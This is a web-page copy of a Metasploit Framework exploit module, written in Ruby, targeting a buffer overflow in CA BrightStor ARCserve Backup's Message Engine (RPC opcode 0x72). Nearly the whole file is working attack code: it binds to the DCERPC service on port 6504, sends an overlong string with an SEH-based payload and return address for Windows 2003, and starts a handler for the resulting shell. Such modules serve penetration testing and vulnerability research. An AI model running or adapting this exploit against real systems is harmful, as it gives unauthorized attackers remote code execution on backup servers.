CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/message_engine_72.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup

17
        11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow

18
        the buffer and execute arbitrary code.

19
      },

20
      'Author'         => [ 'MC' ],

21
      'License'        => MSF_LICENSE,

22
      'References'     =>

23
        [

24
          [ 'OSVDB', '68329'],

25
          [ 'URL', 'http://www.metasploit.com/users/mc' ],

26
        ],

27
      'Privileged'     => true,

28
      'DefaultOptions' =>

29
        {

30
          'EXITFUNC' => 'thread',

31
        },

32
      'Payload'        =>

33
        {

34
          'Space'    => 600,

35
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",

36
          'StackAdjustment' => -3500,

37
        },

38
      'Platform' => 'win',

39
      'Targets'  =>

40
        [

41
          [ 'BrightStor ARCserve r11.5/Windows 2003',	{ 'Ret' => 0x2380ceb5 } ],

42
        ],

43
      'DisclosureDate' => '2010-10-04',

44
      'DefaultTarget' => 0))

45


46
    register_options([Opt::RPORT(6504)])

47
  end

48


49
  def exploit

50


51
    connect

52


53
    handle = dcerpc_handle('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])

54
    print_status("Binding to #{handle} ...")

55


56
    dcerpc_bind(handle)

57
    print_status("Bound to #{handle} ...")

58


59
    sploit = NDR.string(rand_text_english(760) + generate_seh_payload(target.ret) + "\x00") + NDR.long(0)

60


61
    print_status("Trying target #{target.name}...")

62


63
      begin

64
        dcerpc_call(0x72, sploit)

65
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse

66
      end

67


68
    handler

69
    disconnect

70


71
  end

72


73
end

74
=begin

75
/* opcode: 0x72, address: 0x28E893D0 */

76


77
short   sub_28E893D0 (

78
 [in] handle_t  arg_1,

79
 [in][ref][string] char * arg_2,

80
 [in, out][ref] long * arg_3

81
);

82
=end

83


84